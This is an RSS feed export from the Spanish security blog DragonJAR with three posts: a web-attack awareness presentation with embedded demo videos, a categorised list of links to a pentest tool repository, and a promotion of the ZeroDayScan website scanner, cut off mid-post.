<?xml version="1.0" encoding="UTF-8"?> <rss
version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
><channel><title>La Comunidad DragonJAR &#187; SQL</title> <atom:link href="http://www.dragonjar.org/tag/sql/feed" rel="self" type="application/rss+xml" /><link>http://www.dragonjar.org</link> <description>Noticias de actualidad y seguridad informática, herramientas de seguridad, documentación y una excelente COMUNIDAD.</description> <lastBuildDate>Fri, 10 Feb 2012 15:17:28 +0000</lastBuildDate> <language>en</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=3.3.1</generator> <item><title>Presentación de conceptos básicos en Seguridad Web</title><link>http://www.dragonjar.org/presentacion-conceptos-basicos-seguridad-web.xhtml</link> <comments>http://www.dragonjar.org/presentacion-conceptos-basicos-seguridad-web.xhtml#comments</comments> <pubDate>Fri, 18 Feb 2011 05:14:43 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Documentacion]]></category> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[0Days]]></category> <category><![CDATA[Blind SQL Injection]]></category> <category><![CDATA[Day]]></category> <category><![CDATA[Seguridad]]></category> <category><![CDATA[SQL]]></category> <category><![CDATA[sql-injection]]></category> <category><![CDATA[Vulnerabilidad]]></category> <category><![CDATA[Vulnerabilidades]]></category> <category><![CDATA[Web]]></category> <category><![CDATA[XSS]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=5790</guid> <description><![CDATA[Marcos García, miembro de nuestra comunidad ha querido compartir con nosotros la siguiente presentación, que referencia a los ataques más comunes sobre las aplicaciones Web. La idea principal es concientizar a los desarrolladores/administradores, para que tengan en cuenta a qué amenazas y riesgos de seguridad están expuestas sus aplicaciones. Es importante señalar que existen más [...]]]></description> <content:encoded><![CDATA[<p
style="float:right; margin:0 0 10px 15px; width:240px;"> <img
src="http://www.dragonjar.org/wp-content/uploads/2011/02/SeguridadWeb.jpg" width="240" title="Presentación de conceptos básicos en Seguridad Web" alt="SeguridadWeb Presentación de conceptos básicos en Seguridad Web" /></p><p>Marcos García, miembro de nuestra comunidad ha querido compartir con nosotros la siguiente presentación, que referencia a los ataques más comunes sobre las <a
href="http://www.dragonjar.org/tag/aplicaciones" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con aplicaciones">aplicaciones</a> <a
href="http://www.dragonjar.org/tag/web" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Web">Web</a>. La  idea principal es concientizar a los desarrolladores/administradores,  para que tengan en cuenta a qué amenazas y riesgos de seguridad están  expuestas sus aplicaciones.</p><p><img
class="aligncenter" src="http://www.dragonjar.org/wp-content/uploads/2011/02/SeguridadWeb.jpg" alt="SeguridadWeb Presentación de conceptos básicos en Seguridad Web"  title="Presentación de conceptos básicos en Seguridad Web" /></p><p>Es importante señalar que existen más ataques, los cuales no figuran en la presentación.<span
id="more-5790"></span></p><p
style="text-align: center;"><object
id="__sse7051472" width="425" height="355"><param
name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=presentacionnueva-110224222745-phpapp02&amp;stripped_title=web-app-attacks-7051472&amp;userName=dragonjar" /><param
name="allowFullScreen" value="true" /><param
name="allowScriptAccess" value="always" /><embed
type="application/x-shockwave-flash" width="425" height="355" src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=presentacionnueva-110224222745-phpapp02&amp;stripped_title=web-app-attacks-7051472&amp;userName=dragonjar" name="__sse7051472" allowscriptaccess="always" allowfullscreen="true"></embed></object></p><p><a
href="http://www.4shared.com/document/fIS3zWR-/documentacion_nueva.html">Descargar documentación</a></p><p>También podremos ver ejemplos prácticos de todas las técnicas mencionadas en los siguientes vídeos.</p><p><a
href="http://www.dragonjar.org/tag/xss" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con XSS">XSS</a><br
/><div
name="mediaspace" id="mediaspace"><div
class="pro-player-container" width="580px" height="365px"><div
id="pro-player-5790pp-single-4f353a9370fee"></div></div></div><script type="text/javascript" charset="utf-8">var flashvars = {width: "580",height: "365",autostart: "false",repeat: "false",backcolor: "111111",frontcolor: "cccccc",lightcolor: "66cc00",stretching: "fill",enablejs: "true",mute: "false",skin: "http://www.dragonjar.org/wp-content/plugins/proplayer/players/skins/3dpixelstyle.swf",image: "http://www.dragonjar.org/wp-content/uploads/2011/12/DragonJARVideo.jpg",plugins: "",javascriptid: "5790pp-single-4f353a9370fee",image: "http://www.dragonjar.org/wp-content/uploads/2011/12/DragonJARVideo.jpg",file: 'http://www.dragonjar.org/wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=5790pp-single-4f353a9370fee&sid=1328888467'};var params = {wmode: "transparent",allowfullscreen: "true",allowscriptaccess: "always",allownetworking: "all"};var attributes = {id: "obj-pro-player-5790pp-single-4f353a9370fee",name: "obj-pro-player-5790pp-single-4f353a9370fee"};swfobject.embedSWF("http://www.dragonjar.org/wp-content/plugins/proplayer/players/player.swf", "pro-player-5790pp-single-4f353a9370fee", "580", "365", "9.0.0", false, flashvars, params, attributes);</script></p><p>CSRF<br
/><div
name="mediaspace" id="mediaspace"><div
class="pro-player-container" width="580px" height="365px"><div
id="pro-player-5790pp-single-4f353a93ea890"></div></div></div><script type="text/javascript" charset="utf-8">var flashvars = {width: "580",height: "365",autostart: "false",repeat: "false",backcolor: "111111",frontcolor: "cccccc",lightcolor: "66cc00",stretching: "fill",enablejs: "true",mute: "false",skin: "http://www.dragonjar.org/wp-content/plugins/proplayer/players/skins/3dpixelstyle.swf",image: "http://www.dragonjar.org/wp-content/uploads/2011/12/DragonJARVideo.jpg",plugins: "",javascriptid: "5790pp-single-4f353a93ea890",image: "http://www.dragonjar.org/wp-content/uploads/2011/12/DragonJARVideo.jpg",file: 'http://www.dragonjar.org/wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=5790pp-single-4f353a93ea890&sid=1328888468'};var params = {wmode: "transparent",allowfullscreen: "true",allowscriptaccess: "always",allownetworking: "all"};var attributes = {id: "obj-pro-player-5790pp-single-4f353a93ea890",name: "obj-pro-player-5790pp-single-4f353a93ea890"};swfobject.embedSWF("http://www.dragonjar.org/wp-content/plugins/proplayer/players/player.swf", "pro-player-5790pp-single-4f353a93ea890", "580", "365", "9.0.0", false, flashvars, params, attributes);</script></p><p>Path Traversal<br
/><div
name="mediaspace" id="mediaspace"><div
class="pro-player-container" width="580px" height="365px"><div
id="pro-player-5790pp-single-4f353a9461687"></div></div></div><script type="text/javascript" charset="utf-8">var flashvars = {width: "580",height: "365",autostart: "false",repeat: "false",backcolor: "111111",frontcolor: "cccccc",lightcolor: "66cc00",stretching: "fill",enablejs: "true",mute: "false",skin: "http://www.dragonjar.org/wp-content/plugins/proplayer/players/skins/3dpixelstyle.swf",image: "http://www.dragonjar.org/wp-content/uploads/2011/12/DragonJARVideo.jpg",plugins: "",javascriptid: "5790pp-single-4f353a9461687",image: "http://www.dragonjar.org/wp-content/uploads/2011/12/DragonJARVideo.jpg",file: 'http://www.dragonjar.org/wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=5790pp-single-4f353a9461687&sid=1328888468'};var params = {wmode: "transparent",allowfullscreen: "true",allowscriptaccess: "always",allownetworking: "all"};var attributes = {id: "obj-pro-player-5790pp-single-4f353a9461687",name: "obj-pro-player-5790pp-single-4f353a9461687"};swfobject.embedSWF("http://www.dragonjar.org/wp-content/plugins/proplayer/players/player.swf", "pro-player-5790pp-single-4f353a9461687", "580", "365", "9.0.0", false, flashvars, params, attributes);</script></p><p>Null Byte<br
/><div
name="mediaspace" id="mediaspace"><div
class="pro-player-container" width="580px" height="365px"><div
id="pro-player-5790pp-single-4f353a94cea07"></div></div></div><script type="text/javascript" charset="utf-8">var flashvars = {width: "580",height: "365",autostart: "false",repeat: "false",backcolor: "111111",frontcolor: "cccccc",lightcolor: "66cc00",stretching: "fill",enablejs: "true",mute: "false",skin: "http://www.dragonjar.org/wp-content/plugins/proplayer/players/skins/3dpixelstyle.swf",image: "http://www.dragonjar.org/wp-content/uploads/2011/12/DragonJARVideo.jpg",plugins: "",javascriptid: "5790pp-single-4f353a94cea07",image: "http://www.dragonjar.org/wp-content/uploads/2011/12/DragonJARVideo.jpg",file: 'http://www.dragonjar.org/wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=5790pp-single-4f353a94cea07&sid=1328888469'};var params = {wmode: "transparent",allowfullscreen: "true",allowscriptaccess: "always",allownetworking: "all"};var attributes = {id: "obj-pro-player-5790pp-single-4f353a94cea07",name: "obj-pro-player-5790pp-single-4f353a94cea07"};swfobject.embedSWF("http://www.dragonjar.org/wp-content/plugins/proplayer/players/player.swf", "pro-player-5790pp-single-4f353a94cea07", "580", "365", "9.0.0", false, flashvars, params, attributes);</script></p><p>OS Commanding<br
/><div
name="mediaspace" id="mediaspace"><div
class="pro-player-container" width="580px" height="365px"><div
id="pro-player-5790pp-single-4f353a954931d"></div></div></div><script type="text/javascript" charset="utf-8">var flashvars = {width: "580",height: "365",autostart: "false",repeat: "false",backcolor: "111111",frontcolor: "cccccc",lightcolor: "66cc00",stretching: "fill",enablejs: "true",mute: "false",skin: "http://www.dragonjar.org/wp-content/plugins/proplayer/players/skins/3dpixelstyle.swf",image: "http://www.dragonjar.org/wp-content/uploads/2011/12/DragonJARVideo.jpg",plugins: "",javascriptid: "5790pp-single-4f353a954931d",image: "http://www.dragonjar.org/wp-content/uploads/2011/12/DragonJARVideo.jpg",file: 'http://www.dragonjar.org/wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=5790pp-single-4f353a954931d&sid=1328888471'};var params = {wmode: "transparent",allowfullscreen: "true",allowscriptaccess: "always",allownetworking: "all"};var attributes = {id: "obj-pro-player-5790pp-single-4f353a954931d",name: "obj-pro-player-5790pp-single-4f353a954931d"};swfobject.embedSWF("http://www.dragonjar.org/wp-content/plugins/proplayer/players/player.swf", "pro-player-5790pp-single-4f353a954931d", "580", "365", "9.0.0", false, flashvars, params, attributes);</script></p><p>Local File Inclusion<br
/><div
name="mediaspace" id="mediaspace"><div
class="pro-player-container" width="580px" height="365px"><div
id="pro-player-5790pp-single-4f353a9767248"></div></div></div><script type="text/javascript" charset="utf-8">var flashvars = {width: "580",height: "365",autostart: "false",repeat: "false",backcolor: "111111",frontcolor: "cccccc",lightcolor: "66cc00",stretching: "fill",enablejs: "true",mute: "false",skin: "http://www.dragonjar.org/wp-content/plugins/proplayer/players/skins/3dpixelstyle.swf",image: "http://www.dragonjar.org/wp-content/uploads/2011/12/DragonJARVideo.jpg",plugins: "",javascriptid: "5790pp-single-4f353a9767248",image: "http://www.dragonjar.org/wp-content/uploads/2011/12/DragonJARVideo.jpg",file: 'http://www.dragonjar.org/wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=5790pp-single-4f353a9767248&sid=1328888472'};var params = {wmode: "transparent",allowfullscreen: "true",allowscriptaccess: "always",allownetworking: "all"};var attributes = {id: "obj-pro-player-5790pp-single-4f353a9767248",name: "obj-pro-player-5790pp-single-4f353a9767248"};swfobject.embedSWF("http://www.dragonjar.org/wp-content/plugins/proplayer/players/player.swf", "pro-player-5790pp-single-4f353a9767248", "580", "365", "9.0.0", false, flashvars, params, attributes);</script></p><p>Remote File Inclusion<br
/><div
name="mediaspace" id="mediaspace"><div
class="pro-player-container" width="580px" height="365px"><div
id="pro-player-5790pp-single-4f353a989ee18"></div></div></div><script type="text/javascript" charset="utf-8">var flashvars = {width: "580",height: "365",autostart: "false",repeat: "false",backcolor: "111111",frontcolor: "cccccc",lightcolor: "66cc00",stretching: "fill",enablejs: "true",mute: "false",skin: "http://www.dragonjar.org/wp-content/plugins/proplayer/players/skins/3dpixelstyle.swf",image: "http://www.dragonjar.org/wp-content/uploads/2011/12/DragonJARVideo.jpg",plugins: "",javascriptid: "5790pp-single-4f353a989ee18",image: "http://www.dragonjar.org/wp-content/uploads/2011/12/DragonJARVideo.jpg",file: 'http://www.dragonjar.org/wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=5790pp-single-4f353a989ee18&sid=1328888473'};var params = {wmode: "transparent",allowfullscreen: "true",allowscriptaccess: "always",allownetworking: "all"};var attributes = {id: "obj-pro-player-5790pp-single-4f353a989ee18",name: "obj-pro-player-5790pp-single-4f353a989ee18"};swfobject.embedSWF("http://www.dragonjar.org/wp-content/plugins/proplayer/players/player.swf", "pro-player-5790pp-single-4f353a989ee18", "580", "365", "9.0.0", false, flashvars, params, attributes);</script></p><p>Information Disclosure<br
/><div
name="mediaspace" id="mediaspace"><div
class="pro-player-container" width="580px" height="365px"><div
id="pro-player-5790pp-single-4f353a9914898"></div></div></div><script type="text/javascript" charset="utf-8">var flashvars = {width: "580",height: "365",autostart: "false",repeat: "false",backcolor: "111111",frontcolor: "cccccc",lightcolor: "66cc00",stretching: "fill",enablejs: "true",mute: "false",skin: "http://www.dragonjar.org/wp-content/plugins/proplayer/players/skins/3dpixelstyle.swf",image: "http://www.dragonjar.org/wp-content/uploads/2011/12/DragonJARVideo.jpg",plugins: "",javascriptid: "5790pp-single-4f353a9914898",image: "http://www.dragonjar.org/wp-content/uploads/2011/12/DragonJARVideo.jpg",file: 'http://www.dragonjar.org/wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=5790pp-single-4f353a9914898&sid=1328888473'};var params = {wmode: "transparent",allowfullscreen: "true",allowscriptaccess: "always",allownetworking: "all"};var attributes = {id: "obj-pro-player-5790pp-single-4f353a9914898",name: "obj-pro-player-5790pp-single-4f353a9914898"};swfobject.embedSWF("http://www.dragonjar.org/wp-content/plugins/proplayer/players/player.swf", "pro-player-5790pp-single-4f353a9914898", "580", "365", "9.0.0", false, flashvars, params, attributes);</script></p><p><a
href="http://www.dragonjar.org/tag/sql" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con SQL">SQL</a> <a
href="http://www.dragonjar.org/tag/injection" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Injection">Injection</a>/<a
href="http://www.dragonjar.org/tag/blind-sql-injection" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Blind SQL Injection">Blind SQL Injection</a><br
/><div
name="mediaspace" id="mediaspace"><div
class="pro-player-container" width="580px" height="365px"><div
id="pro-player-5790pp-single-4f353a99825b0"></div></div></div><script type="text/javascript" charset="utf-8">var flashvars = {width: "580",height: "365",autostart: "false",repeat: "false",backcolor: "111111",frontcolor: "cccccc",lightcolor: "66cc00",stretching: "fill",enablejs: "true",mute: "false",skin: "http://www.dragonjar.org/wp-content/plugins/proplayer/players/skins/3dpixelstyle.swf",image: "http://www.dragonjar.org/wp-content/uploads/2011/12/DragonJARVideo.jpg",plugins: "",javascriptid: "5790pp-single-4f353a99825b0",image: "http://www.dragonjar.org/wp-content/uploads/2011/12/DragonJARVideo.jpg",file: 'http://www.dragonjar.org/wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=5790pp-single-4f353a99825b0&sid=1328888473'};var params = {wmode: "transparent",allowfullscreen: "true",allowscriptaccess: "always",allownetworking: "all"};var attributes = {id: "obj-pro-player-5790pp-single-4f353a99825b0",name: "obj-pro-player-5790pp-single-4f353a99825b0"};swfobject.embedSWF("http://www.dragonjar.org/wp-content/plugins/proplayer/players/player.swf", "pro-player-5790pp-single-4f353a99825b0", "580", "365", "9.0.0", false, flashvars, params, attributes);</script></p><p>File Upload<br
/><div
name="mediaspace" id="mediaspace"><div
class="pro-player-container" width="580px" height="365px"><div
id="pro-player-5790pp-single-4f353a99eb9be"></div></div></div><script type="text/javascript" charset="utf-8">var flashvars = {width: "580",height: "365",autostart: "false",repeat: "false",backcolor: "111111",frontcolor: "cccccc",lightcolor: "66cc00",stretching: "fill",enablejs: "true",mute: "false",skin: "http://www.dragonjar.org/wp-content/plugins/proplayer/players/skins/3dpixelstyle.swf",image: "http://www.dragonjar.org/wp-content/uploads/2011/12/DragonJARVideo.jpg",plugins: "",javascriptid: "5790pp-single-4f353a99eb9be",image: "http://www.dragonjar.org/wp-content/uploads/2011/12/DragonJARVideo.jpg",file: 'http://www.dragonjar.org/wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=5790pp-single-4f353a99eb9be&sid=1328888474'};var params = {wmode: "transparent",allowfullscreen: "true",allowscriptaccess: "always",allownetworking: "all"};var attributes = {id: "obj-pro-player-5790pp-single-4f353a99eb9be",name: "obj-pro-player-5790pp-single-4f353a99eb9be"};swfobject.embedSWF("http://www.dragonjar.org/wp-content/plugins/proplayer/players/player.swf", "pro-player-5790pp-single-4f353a99eb9be", "580", "365", "9.0.0", false, flashvars, params, attributes);</script></p><p>Agradecimientos especiales a <a
href="http://twitter.com/artsweb">Marcos García</a> por compartir <a
href="http://code.google.com/p/webatttack/">esta información con nosotros</a>.</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/revisa-la-seguridad-de-tu-sitio-web-gratis.xhtml" title="Revisa la seguridad de tu sitio web Gratis">Revisa la seguridad de tu sitio web Gratis</a></li><li><a
href="http://www.dragonjar.org/curso-gratis-desarrollo-seguro-aplicaciones-web-google.xhtml" title="Curso sobre desarrollo seguro de aplicaciones web por Google">Curso sobre desarrollo seguro de aplicaciones web por Google</a></li><li><a
href="http://www.dragonjar.org/x5s-encuentra-fallos-xss-lfi-y-rfi-facilmente.xhtml" title="X5S &#8211; Encuentra fallos XSS, LFI y RFI fácilmente">X5S &#8211; Encuentra fallos XSS, LFI y RFI fácilmente</a></li><li><a
href="http://www.dragonjar.org/top-10-fallos-de-seguridad-en-aplicaciones-web.xhtml" title="TOP 10 Fallos de Seguridad en Aplicaciones Web">TOP 10 Fallos de Seguridad en Aplicaciones Web</a></li><li><a
href="http://www.dragonjar.org/multiples-vulnerabilidades-smf.xhtml" title="Multiples Vulnerabilidades en SMF">Multiples Vulnerabilidades en SMF</a></li><li><a
href="http://www.dragonjar.org/skipfish-escaner-seguridad-para-aplicaciones-web.xhtml" title="Skipfish, escáner de seguridad para aplicaciones web">Skipfish, escáner de seguridad para aplicaciones web</a></li><li><a
href="http://www.dragonjar.org/vulnerabilidad-xss-8-millones-aplicaciones-flash.xhtml" title="Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash">Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash</a></li><li><a
href="http://www.dragonjar.org/xss-que-permite-postear-en-wordpress.xhtml" title="XSS que permite postear a atacante registrado en WordPress">XSS que permite postear a atacante registrado en WordPress</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/presentacion-conceptos-basicos-seguridad-web.xhtml/feed</wfw:commentRss> <slash:comments>3</slash:comments> </item> <item><title>Repositorio con Herramientas de Seguridad</title><link>http://www.dragonjar.org/repositorio-con-herramientas-de-seguridad.xhtml</link> <comments>http://www.dragonjar.org/repositorio-con-herramientas-de-seguridad.xhtml#comments</comments> <pubDate>Tue, 24 Aug 2010 06:22:40 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Herramientas Seguridad]]></category> <category><![CDATA[Bluetooth]]></category> <category><![CDATA[Cracking]]></category> <category><![CDATA[Fingerprinting]]></category> <category><![CDATA[Herramientas]]></category> <category><![CDATA[Injection]]></category> <category><![CDATA[Networking]]></category> <category><![CDATA[repositorio]]></category> <category><![CDATA[scanners]]></category> <category><![CDATA[Seguridad]]></category> <category><![CDATA[Sniffer]]></category> <category><![CDATA[SQL]]></category> <category><![CDATA[SSL]]></category> <category><![CDATA[Wi-Fi]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=4842</guid> <description><![CDATA[Gracias a kagure he encontrado un repositorio bastante ordenado con herramientas de seguridad, algunos grandes conocidas, otras no tanto, pero todas muy útiles. Les dejo los enlaces a cada categoría para que descubras nuevas herramientas, aprendas de ellas y las utilices. Bluetooth Tools/ Browser Extensions/ Exploitation Tools/ Information Gathering/ Libraries/ Network Discovery tools/ Network Login [...]]]></description> <content:encoded><![CDATA[<p
style="float:right; margin:0 0 10px 15px; width:240px;"> <img
src="http://www.dragonjar.org/wp-content/uploads/2010/08/Herramientas.jpg" width="240" title="Repositorio con Herramientas de Seguridad" alt="Herramientas Repositorio con Herramientas de Seguridad" /></p><p>Gracias a <a
rel="nofollow" href="http://comunidad.dragonjar.org/members/kagure/">kagure</a> he encontrado un <a
href="http://www.dragonjar.org/tag/repositorio" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con repositorio">repositorio</a> bastante ordenado con <a
href="http://www.dragonjar.org/tag/herramientas" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Herramientas">herramientas</a> de <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a>, algunos grandes conocidas, otras no tanto, pero todas muy útiles.</p><p
style="text-align: center;"><img
class="alignnone" title="Herramientas de Seguridad" src="http://www.dragonjar.org/wp-content/uploads/2010/08/Herramientas.jpg" alt="Herramientas Repositorio con Herramientas de Seguridad" width="429" height="318" /></p><p
style="text-align: center;">Les dejo los enlaces a cada categoría para que descubras nuevas herramientas, aprendas de ellas y las utilices.</p><ul><li><a
href="http://pentester.fr/resources/tools/pentest/Bluetooth%20Tools/">Bluetooth Tools/</a></li><li><a
href="http://pentester.fr/resources/tools/pentest/Browser%20Extensions/">Browser Extensions/</a></li><li><a
href="http://pentester.fr/resources/tools/pentest/Exploitation%20Tools/">Exploitation Tools/</a></li><li><a
href="http://pentester.fr/resources/tools/pentest/Information%20Gathering/">Information Gathering/</a></li><li><a
href="http://pentester.fr/resources/tools/pentest/Libraries/">Libraries/</a></li><li><a
href="http://pentester.fr/resources/tools/pentest/Network%20Discovery%20tools/">Network Discovery tools/</a></li><li><a
href="http://pentester.fr/resources/tools/pentest/Network%20Login%20Auditors/">Network Login Auditors/</a></li><li><a
href="http://pentester.fr/resources/tools/pentest/Network%20Security%20Scanners/">Network Security Scanners/</a></li><li><a
href="http://pentester.fr/resources/tools/pentest/Networking%20Utilities/">Networking Utilities/</a></li><li><a
href="http://pentester.fr/resources/tools/pentest/OS%20Detection%20Tools/">OS Detection Tools/</a></li><li><a
href="http://pentester.fr/resources/tools/pentest/Packet%20Crafting%20Tools/">Packet Crafting Tools/</a></li><li><a
href="http://pentester.fr/resources/tools/pentest/Packet%20Sniffers/">Packet Sniffers/</a></li><li><a
href="http://pentester.fr/resources/tools/pentest/Password%20Auditing/">Password Auditing/</a></li><li><a
href="http://pentester.fr/resources/tools/pentest/Password%20Cracking/">Password Cracking/</a></li><li><a
href="http://pentester.fr/resources/tools/pentest/Port%20Scanners/">Port Scanners/</a></li><li><a
href="http://pentester.fr/resources/tools/pentest/Reverse%20Engineering/">Reverse Engineering/</a></li><li><a
href="http://pentester.fr/resources/tools/pentest/SQL%20Injection/">SQL Injection/</a></li><li><a
href="http://pentester.fr/resources/tools/pentest/SSL%20Checkers/">SSL Checkers/</a></li><li><a
href="http://pentester.fr/resources/tools/pentest/SSL%20Proxies/">SSL Proxies/</a></li><li><a
href="http://pentester.fr/resources/tools/pentest/Service%20Fingerprinting/">Service Fingerprinting/</a></li><li><a
href="http://pentester.fr/resources/tools/pentest/Thick%20Client%20Tools/">Thick Client Tools/</a></li><li><a
href="http://pentester.fr/resources/tools/pentest/VoIP%20Security%20Tools/">VoIP Security Tools/</a></li><li><a
href="http://pentester.fr/resources/tools/pentest/Web%20Applicative%20Proxies/">Web Applicative Proxies/</a></li><li><a
href="http://pentester.fr/resources/tools/pentest/Web%20Applicative%20Scanners/">Web Applicative Scanners/</a></li><li><a
href="http://pentester.fr/resources/tools/pentest/Web%20Services%20Security%20Tools/">Web Services Security Tools/</a></li><li><a
href="http://pentester.fr/resources/tools/pentest/Web%20Vulnerability%20Scanners/">Web Vulnerability Scanners/</a></li><li><a
href="http://pentester.fr/resources/tools/pentest/Wi-Fi/">Wi-Fi/</a></li></ul><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/hackarmoury-herramientas-de-seguridad-siempre-disponibles.xhtml" title="HackArmoury herramientas de seguridad siempre disponibles">HackArmoury herramientas de seguridad siempre disponibles</a></li><li><a
href="http://www.dragonjar.org/kits-de-crackeo-wireless-en-china.xhtml" title="Kits de crackeo wireless en china">Kits de crackeo wireless en china</a></li><li><a
href="http://www.dragonjar.org/nuestros-retos-forenses.xhtml" title="Nuestros Retos Forenses">Nuestros Retos Forenses</a></li><li><a
href="http://www.dragonjar.org/presentacion-conceptos-basicos-seguridad-web.xhtml" title="Presentación de conceptos básicos en Seguridad Web">Presentación de conceptos básicos en Seguridad Web</a></li><li><a
href="http://www.dragonjar.org/re-lanzamiento-3er-reto-forense-comunidad-dragonjar.xhtml" title="Resultados e Informes &#8211; 3er Reto Forense Comunidad DragonJAR">Resultados e Informes &#8211; 3er Reto Forense Comunidad DragonJAR</a></li><li><a
href="http://www.dragonjar.org/tercer-reto-forense-de-la-comunidad-dragonjar.xhtml" title="Tercer Reto Forense de La Comunidad DragonJAR">Tercer Reto Forense de La Comunidad DragonJAR</a></li><li><a
href="http://www.dragonjar.org/segundo-reto-forense-de-la-comunidad-dragonjar.xhtml" title="Segundo Reto Forense de La Comunidad DragonJAR">Segundo Reto Forense de La Comunidad DragonJAR</a></li><li><a
href="http://www.dragonjar.org/ssdownloader-gestor-de-descargas-para-herramientas-de-seguridad.xhtml" title="SSDownloader &#8211; Gestor de descargas para Herramientas de Seguridad">SSDownloader &#8211; Gestor de descargas para Herramientas de Seguridad</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/repositorio-con-herramientas-de-seguridad.xhtml/feed</wfw:commentRss> <slash:comments>10</slash:comments> </item> <item><title>Revisa la seguridad de tu sitio web Gratis</title><link>http://www.dragonjar.org/revisa-la-seguridad-de-tu-sitio-web-gratis.xhtml</link> <comments>http://www.dragonjar.org/revisa-la-seguridad-de-tu-sitio-web-gratis.xhtml#comments</comments> <pubDate>Wed, 02 Jun 2010 05:08:29 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[0Days]]></category> <category><![CDATA[Administradores]]></category> <category><![CDATA[Backup]]></category> <category><![CDATA[Day]]></category> <category><![CDATA[Seguridad]]></category> <category><![CDATA[SQL]]></category> <category><![CDATA[Vulnerabilidad]]></category> <category><![CDATA[Vulnerabilidades]]></category> <category><![CDATA[XSS]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=4469</guid> <description><![CDATA[Cuando se administra un servidor Web, uno de los puntos claves a tener en cuenta es la seguridad tanto de los servicios como de los aplicativos alojados en el, ya que si no contamos con buenas medidas de seguridad, dichos aplicativos, podría ser la puerta de entrada a nuestra organización de un delincuente informático. Desafortunadamente, [...]]]></description> <content:encoded><![CDATA[<p
style="float:right; margin:0 0 10px 15px; width:240px;"> <img
src="http://www.dragonjar.org/wp-content/uploads/2010/06/zero.jpg" width="240" title="Revisa la seguridad de tu sitio web Gratis" alt="zero Revisa la seguridad de tu sitio web Gratis" /></p><p>Cuando se administra un servidor <a
href="http://www.dragonjar.org/tag/web" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Web">Web</a>, uno de los puntos claves a tener en cuenta es la <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> tanto de los servicios como de los aplicativos alojados en el, ya que si no contamos con buenas medidas de <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a>, dichos aplicativos, podría ser la puerta de entrada a nuestra organización de un delincuente informático.</p><p
style="text-align: center;"><img
class="aligncenter" src="http://www.dragonjar.org/wp-content/uploads/2010/06/ZeroBugs.jpg" alt="ZeroBugs Revisa la seguridad de tu sitio web Gratis"  title="Revisa la seguridad de tu sitio web Gratis" /></p><p>Desafortunadamente, son pocos los <a
href="http://www.dragonjar.org/tag/administradores" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Administradores">administradores</a> que cuentan con conocimientos en <a
href="http://www.dragonjar.org/tag/seguridad-web" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad Web">seguridad Web</a> y es por esto que día a día se ven casos de instrucciones en donde los sitios Web fueron el débil eslabón por medio del cual ingresaron a los sistemas de una organización.<span
id="more-4469"></span></p><p>ZeroDayScan es un servicio que ayuda en la tarea de revisar la seguridad de un aplicativo Web automáticamente, para utilizarlo, solo necesitamos llenar el siguiente formulario, como se indica en la siguiente imagen:</p><p
style="text-align: center;"><img
class="aligncenter" title="Instrucciones ZeroDayScan" src="http://i.imgur.com/Ec2U7.jpg" alt="Ec2U7 Revisa la seguridad de tu sitio web Gratis" width="500" height="573" /></p><p>La aplicación permite detectar las siguientes <a
href="http://www.dragonjar.org/tag/vulnerabilidades" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Vulnerabilidades">vulnerabilidades</a></p><ul><li> Cross Site Scripting attacks (<a
href="http://www.dragonjar.org/tag/xss" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con XSS">XSS</a>)</li><li>Detecta directorios ocultos o backups</li><li>Busca inyecciones <a
href="http://www.dragonjar.org/tag/sql" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con SQL">SQL</a></li><li><strong>Detecta automáticamente vulnerabilidades Zero <a
